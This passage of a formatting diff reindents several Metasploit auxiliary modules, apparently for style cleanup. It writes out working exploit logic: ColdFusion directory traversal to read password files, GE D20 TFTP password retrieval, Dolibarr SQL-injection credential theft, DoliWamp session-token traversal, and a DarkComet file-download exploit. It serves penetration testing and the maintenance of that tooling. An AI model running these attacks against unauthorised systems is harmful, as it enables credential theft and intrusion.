-    elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright 1995-2012 Adobe/ and response.body =~ /Administrator requires a browser that supports frames/ )
+    elsif (response.body =~ /<meta name=\"Author\" content=\"Copyright 1995-2012 Adobe/ and response.body =~ /Administrator requires a browser that supports frames/)
      out = "Adobe ColdFusion MX7 (Not Vulnerable)"
-    elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2006 Adobe/)
+    elsif (response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2006 Adobe/)
      out = "Adobe ColdFusion 8 (Not Vulnerable)"
-    elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2010 Adobe/ and
+    elsif (response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2010 Adobe/ and
      response.body =~ /1997\-2012 Adobe Systems Incorporated and its licensors/)
      out = "Adobe ColdFusion 10"
-    elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2010 Adobe/ or
+    elsif (response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2010 Adobe/ or
      response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2009 Adobe Systems\, Inc\. All rights reserved/)
      out = "Adobe ColdFusion 9"
-    elsif(response.body =~ /<meta name=\"Keywords\" content=\"(.*)\">\s+<meta name/)
+    elsif (response.body =~ /<meta name=\"Keywords\" content=\"(.*)\">\s+<meta name/)
      out = $1.split(/,/)[0]
    else
      out = 'Unknown ColdFusion'
    end

-    if(title.downcase == 'coldfusionadministrator')
+    if (title.downcase == 'coldfusionadministrator')
      out << " (you have administrator access)"
    end

    out << " (#{os})"
    file = ''
    trav = ''
-    if(os =~ /Windows/ )
+    if (os =~ /Windows/)
      trav = '..\..\..\..\..\..\..\..\..\..'
      file = (out =~ /ColdFusion 9/) ? '\ColdFusion9\lib\password.properties' : '\ColdFusion10\CFusion\lib\password.properties'
    else
@@ -96,13 +103,13 @@ class MetasploitModule < Msf::Auxiliary
      file = (out =~ /ColdFusion 9/) ? '/opt/coldfusion9/lib/password.properties' : '/opt/coldfusion10/cfusion/lib/password.properties'
    end

-    if(response.body =~ /Adobe/ and response.body =~ /ColdFusion/ and file == '')
+    if (response.body =~ /Adobe/ and response.body =~ /ColdFusion/ and file == '')
      print_error("#{peer} Fingerprint failed...aborting")
      print_status("response: #{response.body}")
-      return nil,nil
+      return nil, nil
    end

-    return out,"#{trav}#{file}"
+    return out, "#{trav}#{file}"
  end

  def check
@@ -117,26 +124,26 @@ class MetasploitModule < Msf::Auxiliary
    vuln = false
    url = '/CFIDE/adminapi/customtags/l10n.cfm'
    res = send_request_cgi({
+      'uri' => url,
+      'method' => 'GET',
+      'Connection' => "keep-alive",
+      'Accept-Encoding' => "zip,deflate",
+    })
+
+    if (res != nil)
+      # can't stack b/c res.code won't exist if res is nil
+      vuln = true if (res.code == 500 and res.body =~ /attributes\.id was not provided/)
+    end
+
+    if (vuln)
+      url = '/CFIDE/administrator/mail/download.cfm'
+      res = send_request_cgi({
        'uri' => url,
        'method' => 'GET',
        'Connection' => "keep-alive",
        'Accept-Encoding' => "zip,deflate",
-        })
-
-    if(res != nil)
-    # can't stack b/c res.code won't exist if res is nil
-      vuln = true if(res.code == 500 and res.body =~ /attributes\.id was not provided/)
-    end
-
-    if(vuln)
-      url = '/CFIDE/administrator/mail/download.cfm'
-      res = send_request_cgi({
-          'uri' => url,
-          'method' => 'GET',
-          'Connection' => "keep-alive",
-          'Accept-Encoding' => "zip,deflate",
-          })
-      if(res != nil)
+      })
+      if (res != nil)
        vuln = false if (res.code != 200)
      end
    end
@@ -144,18 +151,17 @@ class MetasploitModule < Msf::Auxiliary
    return vuln
  end

-
  def run
    filename = ""

    url = '/CFIDE/administrator/index.cfm'
    # print_status("Getting index...")
    res = send_request_cgi({
-        'uri' => url,
-        'method' => 'GET',
-        'Connection' => "keep-alive",
-        'Accept-Encoding' => "zip,deflate",
-        })
+      'uri' => url,
+      'method' => 'GET',
+      'Connection' => "keep-alive",
+      'Accept-Encoding' => "zip,deflate",
+    })
    # print_status("Got back: #{res.inspect}")
    return if not res
    return if not res.body or not res.code
@@ -164,31 +170,31 @@ class MetasploitModule < Msf::Auxiliary
    out, filename = fingerprint(res)
    print_status("#{peer} #{out}") if out

-    if(out =~ /Not Vulnerable/)
+    if (out =~ /Not Vulnerable/)
      print_status("#{peer} isn't vulnerable to this attack")
      return
    end

-    if(not check_cf)
+    if (not check_cf)
      print_status("#{peer} can't be exploited (either files missing or permissions block access)")
      return
    end

    res = send_request_cgi({
-      'method'   => 'GET',
-      'uri'      => normalize_uri(target_uri.path, 'CFIDE', 'adminapi', 'customtags', 'l10n.cfm'),
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'CFIDE', 'adminapi', 'customtags', 'l10n.cfm'),
      'encode_params' => false,
      'encode' => false,
      'vars_get' => {
-        'attributes.id'            => 'it',
-        'attributes.file'          => '../../administrator/mail/download.cfm',
-        'filename'                 => filename,
-        'attributes.locale'        => 'it',
-        'attributes.var'           => 'it',
-        'attributes.jscript'       => 'false',
-        'attributes.type'          => 'text/html',
-        'attributes.charset'       => 'UTF-8',
-        'thisTag.executionmode'    => 'end',
+        'attributes.id' => 'it',
+        'attributes.file' => '../../administrator/mail/download.cfm',
+        'filename' => filename,
+        'attributes.locale' => 'it',
+        'attributes.var' => 'it',
+        'attributes.jscript' => 'false',
+        'attributes.type' => 'text/html',
+        'attributes.charset' => 'UTF-8',
+        'thisTag.executionmode' => 'end',
        'thisTag.generatedContent' => 'htp'
      }
    })
@@ -198,9 +204,9 @@ class MetasploitModule < Msf::Auxiliary
      return
    end

-    rdspass   = res.body.scan(/^rdspassword=(.+)/).flatten[0] || ''
-    password  = res.body.scan(/^password=(.+)/).flatten[0]    || ''
-    encrypted = res.body.scan(/^encrypted=(.+)/).flatten[0]   || ''
+    rdspass = res.body.scan(/^rdspassword=(.+)/).flatten[0] || ''
+    password = res.body.scan(/^password=(.+)/).flatten[0] || ''
+    encrypted = res.body.scan(/^encrypted=(.+)/).flatten[0] || ''

    if rdspass.empty? and password.empty?
      # No pass collected, no point to store anything
@@ -9,33 +9,41 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'CorpWatch Company ID Information Search',
-      'Description'    => %q{
-        This module interfaces with the CorpWatch API to get publicly available
-        info for a given CorpWatch ID of the company.  If you don't know the
-        CorpWatch ID, please use the corpwatch_lookup_name module first.
-      },
-      'Author'         => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' ],
-      'References'     =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'CorpWatch Company ID Information Search',
+        'Description' => %q{
+          This module interfaces with the CorpWatch API to get publicly available
+          info for a given CorpWatch ID of the company.  If you don't know the
+          CorpWatch ID, please use the corpwatch_lookup_name module first.
+        },
+        'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' ],
+        'References' => [
          [ 'URL', 'http://api.corpwatch.org/' ]
-        ]
-    ))
+        ],
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    deregister_http_client_options

    register_options(
      [
        OptString.new('CW_ID', [ true, "The CorpWatch ID of the company", ""]),
-        OptInt.new('YEAR', [ false, "Year to look up", Time.now.year-1]),
+        OptInt.new('YEAR', [ false, "Year to look up", Time.now.year - 1]),
        OptBool.new('GET_LOCATIONS', [ false, "Get locations for company", true]),
        OptBool.new('GET_NAMES', [ false, "Get all registered names ofr the company", true]),
        OptBool.new('GET_FILINGS', [ false, "Get all filings", false ]),
        OptBool.new('GET_CHILDREN', [false, "Get children companies", true]),
        OptInt.new('CHILD_LIMIT', [false, "Set limit to how many children we can get", 5]),
        OptBool.new('GET_HISTORY', [false, "Get company history", false])
-      ])
+      ]
+    )
  end

  def rhost_corpwatch
@@ -47,17 +55,16 @@ class MetasploitModule < Msf::Auxiliary
  end

  def run
-
    loot = ""
    uri = "/"
    uri << (datastore['YEAR']).to_s if datastore['YEAR'].to_s != ""
    uri << ("/companies/" + datastore['CW_ID'])

    res = send_request_cgi({
-      'rhost'    => rhost_corpwatch,
-      'rport'    => rport_corpwatch,
-      'uri'      => uri + ".xml",
-      'method'   => 'GET'
+      'rhost' => rhost_corpwatch,
+      'rport' => rport_corpwatch,
+      'uri' => uri + ".xml",
+      'method' => 'GET'
    }, 25)

    if res == nil
@@ -116,13 +123,13 @@ class MetasploitModule < Msf::Auxiliary
      loot << ("\nSector: " + (sector = grab_text(e, "sector_name")))
      loot << ("\nSource: " + (source = grab_text(e, "source_type")))
      loot << ("\nAddress: " + (address = grab_text(e, "raw_address")))
-      loot << ("\nCountry: " + ( country = grab_text(e, "country_code")))
+      loot << ("\nCountry: " + (country = grab_text(e, "country_code")))
      loot << ("\nSub-Division: " + (subdiv = grab_text(e, "subdiv_code")))
      loot << ("\nTop Parent CW_ID: " + (top_parent = grab_text(e, "top_parent_id")))
      loot << ("\nNumber of parents: " + (num_parents = grab_text(e, "num_parents")))
      loot << ("\nNumber of children: " + (num_children = grab_text(e, "num_children")))
      loot << ("\nMax searchable year: " + (max_year = grab_text(e, "max_year")))
-      loot << ("\nMinimum searchable year: "+ (min_year = grab_text(e, "min_year")))
+      loot << ("\nMinimum searchable year: " + (min_year = grab_text(e, "min_year")))
      loot << "\n\n\n"

      print_status("Basic Information\n--------------------")
@@ -152,12 +159,13 @@ class MetasploitModule < Msf::Auxiliary
    if datastore['GET_LOCATIONS']

      res = send_request_cgi(
-      {
-        'rhost'   => rhost_corpwatch,
-        'rport'   => rport_corpwatch,
-        'uri'     => uri + "/locations.xml",
-        'method'  => 'GET'
-      }, 25)
+        {
+          'rhost' => rhost_corpwatch,
+          'rport' => rport_corpwatch,
+          'uri' => uri + "/locations.xml",
+          'method' => 'GET'
+        }, 25
+      )

      if res == nil
        print_error("Server down or bad response")
@@ -190,9 +198,9 @@ class MetasploitModule < Msf::Auxiliary
        results.elements.each { |e|
          loot << ("CorpWatch ID: " + (cwid = grab_text(e, "cw_id")))
          loot << ("\nCountry code: " + (country_code = grab_text(e, "country_code"))
-          loot << ("\nSubdivision code: " + (subdiv_code = grab_text(e, "subdiv_code")))
-          loot << ("\nType: " + (type = grab_text(e, "type")))
-          loot << ("\nFull address: " + full_address = grab_text(e, "raw_address")))
+                   loot << ("\nSubdivision code: " + (subdiv_code = grab_text(e, "subdiv_code")))
+                   loot << ("\nType: " + (type = grab_text(e, "type")))
+                   loot << ("\nFull address: " + full_address = grab_text(e, "raw_address")))
          loot << ("\nStreet 1: " + (street1 = grab_text(e, "street_1")))
          loot << ("\nStreet 2: " + (street2 = grab_text(e, "street_2")))
          loot << ("\nCity: " + (city = grab_text(e, "city")))
@@ -224,12 +232,13 @@ class MetasploitModule < Msf::Auxiliary
    if datastore['GET_NAMES']

      res = send_request_cgi(
-      {
-        'rhost'   => rhost_corpwatch,
-        'rport'   => rport_corpwatch,
-        'uri'     => uri + "/names.xml",
-        'method'  => 'GET'
-      }, 25)
+        {
+          'rhost' => rhost_corpwatch,
+          'rport' => rport_corpwatch,
+          'uri' => uri + "/names.xml",
+          'method' => 'GET'
+        }, 25
+      )

      if res == nil
        print_error("Server down or bad response")
@@ -286,12 +295,13 @@ class MetasploitModule < Msf::Auxiliary
    if datastore['GET_FILINGS']

      res = send_request_cgi(
-      {
-        'rhost'   => rhost_corpwatch,
-        'rport'   => rport_corpwatch,
-        'uri'     => uri + "/filings.xml",
-        'method'  => 'GET'
-      }, 25)
+        {
+          'rhost' => rhost_corpwatch,
+          'rport' => rport_corpwatch,
+          'uri' => uri + "/filings.xml",
+          'method' => 'GET'
+        }, 25
+      )

      if res == nil
        print_error("Server down or response broken")
@@ -366,12 +376,13 @@ class MetasploitModule < Msf::Auxiliary
      end

      res = send_request_cgi(
-      {
-        'rhost'   => rhost_corpwatch,
-        'rport'   => rport_corpwatch,
-        'uri'      => child_uri,
-        'method'   => 'GET'
-      }, 25)
+        {
+          'rhost' => rhost_corpwatch,
+          'rport' => rport_corpwatch,
+          'uri' => child_uri,
+          'method' => 'GET'
+        }, 25
+      )

      if res == nil
        print_error("Server down or bad response")
@@ -448,10 +459,10 @@ class MetasploitModule < Msf::Auxiliary
    if datastore['GET_HISTORY']

      res = send_request_cgi({
-        'rhost'   => rhost_corpwatch,
-        'rport'   => rport_corpwatch,
-        'uri'     => uri + "/history.xml",
-        'method'  => 'GET'
+        'rhost' => rhost_corpwatch,
+        'rport' => rport_corpwatch,
+        'uri' => uri + "/history.xml",
+        'method' => 'GET'
      }, 25)

      if res == nil
@@ -524,7 +535,7 @@ class MetasploitModule < Msf::Auxiliary
      end
    end

-    p = store_loot("corpwatch_api.#{datastore['CW_ID']}_info","text/plain",nil,loot,"company_#{datastore['CW_ID']}.txt","#{datastore["CW_ID"]} Specific Information")
+    p = store_loot("corpwatch_api.#{datastore['CW_ID']}_info", "text/plain", nil, loot, "company_#{datastore['CW_ID']}.txt", "#{datastore["CW_ID"]} Specific Information")

    print_line()
    print_status("Saved in: #{p}")
@@ -532,7 +543,7 @@ class MetasploitModule < Msf::Auxiliary

  def grab_text(e, name)
    (e.get_elements(name) && e.get_elements(name)[0] &&
-    e.get_elements(name)[0].get_text ) ?
+    e.get_elements(name)[0].get_text) ?
    e.get_elements(name)[0].get_text.to_s : ""
  end
 end
@@ -10,30 +10,38 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'CorpWatch Company Name Information Search',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'CorpWatch Company Name Information Search',
+        'Description' => %q{
          This module interfaces with the CorpWatch API to get publicly available
-        info for a given company name.  Please note that by using CorpWatch API, you
-        acknowledge the limitations of the data CorpWatch provides, and should always
-        verify the information with the official SEC filings before taking any action.
-      },
-      'Author'         => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' ],
-      'References'     =>
-        [
+          info for a given company name.  Please note that by using CorpWatch API, you
+          acknowledge the limitations of the data CorpWatch provides, and should always
+          verify the information with the official SEC filings before taking any action.
+        },
+        'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' ],
+        'References' => [
          [ 'URL', 'http://api.corpwatch.org/' ]
-        ]
-    ))
+        ],
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    deregister_http_client_options

    register_options(
      [
        OptString.new('COMPANY_NAME', [ true, "Search for companies with this name", ""]),
-        OptInt.new('YEAR', [ false, "Year to look up", Time.now.year-1]),
+        OptInt.new('YEAR', [ false, "Year to look up", Time.now.year - 1]),
        OptString.new('LIMIT', [ true, "Limit the number of results returned", "5"]),
        OptString.new('CORPWATCH_APIKEY', [ false, "Use this API key when getting the data", ""]),
-      ])
+      ]
+    )
  end

  def rhost_corpwatch
@@ -45,24 +53,24 @@ class MetasploitModule < Msf::Auxiliary
  end

  def run
-
    uri = "/"
    uri << (datastore['YEAR'].to_s + "/") if datastore['YEAR'].to_s != ""
    uri << "companies.xml"

    res = send_request_cgi(
-    {
-      'rhost'    => rhost_corpwatch,
-      'rport'    => rport_corpwatch,
-      'uri'      => uri,
-      'method'   => 'GET',
-      'vars_get' =>
      {
-        'company_name' => datastore['COMPANY_NAME'],
-        'limit'        => datastore['LIMIT'],
-        'key'          => datastore['CORPWATCH_APIKEY']
-      }
-    }, 25)
+        'rhost' => rhost_corpwatch,
+        'rport' => rport_corpwatch,
+        'uri' => uri,
+        'method' => 'GET',
+        'vars_get' =>
+        {
+          'company_name' => datastore['COMPANY_NAME'],
+          'limit' => datastore['LIMIT'],
+          'key' => datastore['CORPWATCH_APIKEY']
+        }
+      }, 25
+    )

    if not res
      print_error("Server down, bad response")
@@ -126,7 +134,7 @@ class MetasploitModule < Msf::Auxiliary

  def grab_text(e, name)
    (e.get_elements(name) && e.get_elements(name)[0] &&
-    e.get_elements(name)[0].get_text ) ?
-    e.get_elements(name)[0].get_text.to_s  : ""
+    e.get_elements(name)[0].get_text) ?
+    e.get_elements(name)[0].get_text.to_s : ""
  end
 end
@@ -8,7 +8,6 @@
 # parses the usernames and passwords from it.
 ##

-
 class MetasploitModule < Msf::Auxiliary
  include Rex::Ui::Text
  include Rex::Proto::TFTP
@@ -16,28 +15,36 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'General Electric D20 Password Recovery',
-      'Description'    => %q{
-        The General Electric D20ME and possibly other units (D200?) feature
-        TFTP readable configurations with plaintext passwords.  This module
-        retrieves the username, password, and authentication level list.
-      },
-      'Author'         => [ 'K. Reid Wightman <wightman[at]digitalbond.com>' ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'General Electric D20 Password Recovery',
+        'Description' => %q{
+          The General Electric D20ME and possibly other units (D200?) feature
+          TFTP readable configurations with plaintext passwords.  This module
+          retrieves the username, password, and authentication level list.
+        },
+        'Author' => [ 'K. Reid Wightman <wightman[at]digitalbond.com>' ],
+        'License' => MSF_LICENSE,
+        'References' => [
          ['CVE', '2012-6663'],
        ],
-      'DisclosureDate' => '2012-01-19'
-      ))
+        'DisclosureDate' => '2012-01-19',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
        Opt::RPORT(69),
        Opt::RHOST('192.168.255.1'),
        OptString.new('REMOTE_CONFIG_NAME', [true, "The remote filename used to retrieve the configuration", "NVRAM\\D20.zlb"])
-      ])
+      ]
+    )
  end

  def setup
@@ -51,16 +58,16 @@ class MetasploitModule < Msf::Auxiliary
  def cleanup
    if @tftp_client and @tftp_client.respond_to? :complete
      while not @tftp_client.complete
-        select(nil,nil,nil,1)
+        select(nil, nil, nil, 1)
        vprint_status "Cleaning up the TFTP client ports and threads."
        @tftp_client.stop
      end
    end
  end

-  def rtarget(ip=nil)
+  def rtarget(ip = nil)
    if (ip or rhost) and rport
-      [(ip || rhost),rport].map {|x| x.to_s}.join(":") << " "
+      [(ip || rhost), rport].map { |x| x.to_s }.join(":") << " "
    elsif (ip or rhost)
      rhost
    else
@@ -72,12 +79,12 @@ class MetasploitModule < Msf::Auxiliary
  def retrieve
    print_status("Retrieving file")
    @tftp_client = Rex::Proto::TFTP::Client.new(
-        "LocalHost" => @lhost,
-        "LocalPort" => @lport,
-        "PeerHost" => @rhost,
-        "PeerPort" => @rport,
-        "RemoteFile" => @rfile,
-        "Action" => :download
+      "LocalHost" => @lhost,
+      "LocalPort" => @lport,
+      "PeerHost" => @rhost,
+      "PeerPort" => @rport,
+      "RemoteFile" => @rfile,
+      "Action" => :download
    )
    @tftp_client.send_read_request { |msg| print_tftp_status(msg) }
    @tftp_client.threads do |thread|
@@ -95,6 +102,7 @@ class MetasploitModule < Msf::Auxiliary
  def makeword(bytestr)
    return bytestr.unpack("n")[0]
  end
+
  # builds abi
  def makelong(bytestr)
    return bytestr.unpack("N")[0]
@@ -160,6 +168,7 @@ class MetasploitModule < Msf::Auxiliary
    if name == myname
      return start
    end
+
    left = leftchild(f, start)
    right = rightchild(f, start)
    if name < myname
@@ -222,9 +231,10 @@ class MetasploitModule < Msf::Auxiliary
    logins = Rex::Text::Table.new(
      'Header' => "D20 usernames, passwords, and account levels\n(use for TELNET authentication)",
      'Indent' => 1,
-      'Columns' => ["Type", "User Name", "Password"])
+      'Columns' => ["Type", "User Name", "Password"]
+    )

-    0.upto(numentries -1).each do |i|
+    0.upto(numentries - 1).each do |i|
      f.seek(dstart + headerlen + i * entrylen)
      accounttype = makeword(f.read(2))
      f.seek(dstart + headerlen + i * entrylen + 2)
@@ -235,7 +245,7 @@ class MetasploitModule < Msf::Auxiliary
        print_error("Bad account parsing at #{dstart + headerlen + i * entrylen}")
        break
      end
-      logins <<  [accounttype,  accountname,  accountpass]
+      logins << [accounttype, accountname, accountpass]
      report_cred(
        ip: datastore['RHOST'],
        port: 23,
@@ -289,11 +299,11 @@ class MetasploitModule < Msf::Auxiliary
  def print_tftp_status(msg)
    case msg
    when /Aborting/, /errors.$/
-      print_error [rtarget,msg].join
+      print_error [rtarget, msg].join
    when /^WRQ accepted/, /^Sending/, /complete!$/
-      print_good [rtarget,msg].join
+      print_good [rtarget, msg].join
    else
-      vprint_status [rtarget,msg].join
+      vprint_status [rtarget, msg].join
    end
  end
 end
@@ -8,26 +8,32 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'DarkComet Server Remote File Download Exploit',
-      'Description'    => %q{
-        This module exploits an arbitrary file download vulnerability in the DarkComet C&C server versions 3.2 and up.
-        The exploit does not need to know the password chosen for the bot/server communication.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'DarkComet Server Remote File Download Exploit',
+        'Description' => %q{
+          This module exploits an arbitrary file download vulnerability in the DarkComet C&C server versions 3.2 and up.
+          The exploit does not need to know the password chosen for the bot/server communication.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
          'Shawn Denbow & Jesse Hertz', # Vulnerability Discovery
          'Jos Wetzels' # Metasploit module, added support for versions < 5.1, removed need to know password via cryptographic attack
        ],
-      'References'     =>
-        [
+        'References' => [
          [ 'URL', 'https://www.nccgroup.com/globalassets/our-research/us/whitepapers/PEST-CONTROL.pdf' ],
          [ 'URL', 'http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware' ]
        ],
-      'DisclosureDate' => '2012-10-08',
-      'Platform'       => 'win'
-    ))
+        'DisclosureDate' => '2012-10-08',
+        'Platform' => 'win',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
@@ -41,7 +47,8 @@ class MetasploitModule < Msf::Auxiliary
        OptBool.new('STORE_LOOT', [false, 'Store file in loot (will simply output file to console if set to false).', true]),
        OptInt.new('BRUTETIMEOUT', [false, 'Timeout (in seconds) for bruteforce attempts', 1])

-      ])
+      ]
+    )
  end

  # Functions for XORing two strings, deriving keystream using known plaintext and applying keystream to produce ciphertext
@@ -7,39 +7,48 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Dolibarr Gather Credentials via SQL Injection',
-      'Description'    => %q{
-         This module enables an authenticated user to collect the usernames and
-         encrypted passwords of other users in the Dolibarr ERP/CRM via SQL
-         injection.
-      },
-      'Author'         => [
-                            'Issam Rabhi',  # PoC
-                            'Kevin Locati', # PoC
-                            'Shelby Pace',  # Metasploit Module
-                          ],
-      'License'        => MSF_LICENSE,
-      'References'     => [
-                            [ 'CVE', '2018-10094' ],
-                            [ 'EDB', '44805']
-                          ],
-      'DisclosureDate' => '2018-05-30'
-    ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Dolibarr Gather Credentials via SQL Injection',
+        'Description' => %q{
+          This module enables an authenticated user to collect the usernames and
+          encrypted passwords of other users in the Dolibarr ERP/CRM via SQL
+          injection.
+        },
+        'Author' => [
+          'Issam Rabhi', # PoC
+          'Kevin Locati', # PoC
+          'Shelby Pace',  # Metasploit Module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'CVE', '2018-10094' ],
+          [ 'EDB', '44805']
+        ],
+        'DisclosureDate' => '2018-05-30',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'The base path to Dolibarr', '/' ]),
        OptString.new('USERNAME', [ true, 'The username for authenticating to Dolibarr', 'admin' ]),
        OptString.new('PASSWORD', [ true, 'The password for authenticating to Dolibarr', 'admin' ])
-      ])
+      ]
+    )
  end

  def check_availability
    login_page = target_uri.path.end_with?('index.php') ? normalize_uri(target_uri.path) : normalize_uri(target_uri.path, '/index.php')
    res = send_request_cgi(
-      'method'  =>  'GET',
-      'uri'     =>  normalize_uri(login_page)
+      'method' => 'GET',
+      'uri' => normalize_uri(login_page)
    )

    return false unless res && res.body.include?('Dolibarr')
@@ -55,15 +64,15 @@ class MetasploitModule < Msf::Auxiliary
    print_status("Logging in...")

    login_res = send_request_cgi(
-       'method'  =>  'POST',
-       'uri'     =>  login_uri,
-       'cookie'  =>  cookies,
-       'vars_post' =>  {
-         'username'  =>  datastore['USERNAME'],
-         'password'  =>  datastore['PASSWORD'],
-         'loginfunction' =>  'loginfunction'
-       }
-     )
+      'method' => 'POST',
+      'uri' => login_uri,
+      'cookie' => cookies,
+      'vars_post' => {
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD'],
+        'loginfunction' => 'loginfunction'
+      }
+    )

    unless login_res && login_res.body.include?('id="mainmenua_members"')
      fail_with(Failure::NoAccess, "Couldn't log into Dolibarr")
@@ -81,13 +90,13 @@ class MetasploitModule < Msf::Auxiliary
    inject_uri <<= cmd

    inject_res = send_request_cgi(
-      'method'  =>  'GET',
-      'uri'     => normalize_uri(inject_uri),
-      'cookie'  => cookies
+      'method' => 'GET',
+      'uri' => normalize_uri(inject_uri),
+      'cookie' => cookies
    )

    unless inject_res && inject_res.body.include?('id="searchFormList"')
-     fail_with(Failure::NotFound, "Failed to access page. The user may not have permissions.")
+      fail_with(Failure::NotFound, "Failed to access page. The user may not have permissions.")
    end

    print_good("Accessed credentials")
@@ -8,31 +8,39 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
-    super(update_info(
-      info,
-      'Name'           => "DoliWamp 'jqueryFileTree.php' Traversal Gather Credentials",
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => "DoliWamp 'jqueryFileTree.php' Traversal Gather Credentials",
+        'Description' => %q{
          This module will extract user credentials from DoliWamp - a WAMP
-        packaged installer distribution for Dolibarr ERP on Windows - versions
-        3.3.0 to 3.4.2 by hijacking a user's session. DoliWamp stores session
-        tokens in filenames in the 'tmp' directory. A directory traversal
-        vulnerability in 'jqueryFileTree.php' allows unauthenticated users
-        to retrieve session tokens by listing the contents of this directory.
-        Note: All tokens expire after 30 minutes of inactivity by default.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         => 'bcoles',
-      'References'     =>
-        [
+          packaged installer distribution for Dolibarr ERP on Windows - versions
+          3.3.0 to 3.4.2 by hijacking a user's session. DoliWamp stores session
+          tokens in filenames in the 'tmp' directory. A directory traversal
+          vulnerability in 'jqueryFileTree.php' allows unauthenticated users
+          to retrieve session tokens by listing the contents of this directory.
+          Note: All tokens expire after 30 minutes of inactivity by default.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => 'bcoles',
+        'References' => [
          ['URL', 'https://doliforge.org/tracker/?func=detail&aid=1212&group_id=144'],
          ['URL', 'https://github.com/Dolibarr/dolibarr/commit/8642e2027c840752c4357c4676af32fe342dc0cb']
        ],
-      'DisclosureDate' => '2014-01-12'))
+        'DisclosureDate' => '2014-01-12',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
    register_options(
      [
-        OptString.new('TARGETURI',      [true, 'The path to Dolibarr', '/dolibarr/']),
+        OptString.new('TARGETURI', [true, 'The path to Dolibarr', '/dolibarr/']),
        OptString.new('TRAVERSAL_PATH', [true, 'The traversal path to the application tmp directory', '../../../../../../../../tmp/'])
-      ])
+      ]
+    )
  end

  #
@@ -42,11 +50,12 @@ class MetasploitModule < Msf::Auxiliary
    tokens = nil
    print_status("Finding session tokens...")
    res = send_request_cgi({
-      'method'    => 'POST',
-      'uri'       => normalize_uri(
+      'method' => 'POST',
+      'uri' => normalize_uri(
        target_uri.path,
-        'includes/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.php'),
-      'cookie'    => @cookie,
+        'includes/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.php'
+      ),
+      'cookie' => @cookie,
      'vars_post' => { 'dir' => datastore['TRAVERSAL_PATH'] }
    })
    if !res
@@ -69,21 +78,21 @@ class MetasploitModule < Msf::Auxiliary
  def get_user_info(user_id)
    vprint_status("Retrieving user's credentials")
    res = send_request_cgi({
-      'method'    => 'GET',
-      'uri'       => normalize_uri(target_uri.path, 'user/fiche.php'),
-      'cookie'    => @cookie,
-      'vars_get'  => Hash[{
-        'action'    => 'edit',
-        'id'        => "#{user_id}"
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'user/fiche.php'),
+      'cookie' => @cookie,
+      'vars_get' => Hash[{
+        'action' => 'edit',
+        'id' => "#{user_id}"
      }.to_a.shuffle]
    })
    if !res
      print_error("Connection failed")
    elsif res.body =~ /User card/
      record = [
-        res.body.scan(/name="login" value="([^"]+)"/             ).flatten.first,
-        res.body.scan(/name="password" value="([^"]+)"/          ).flatten.first,
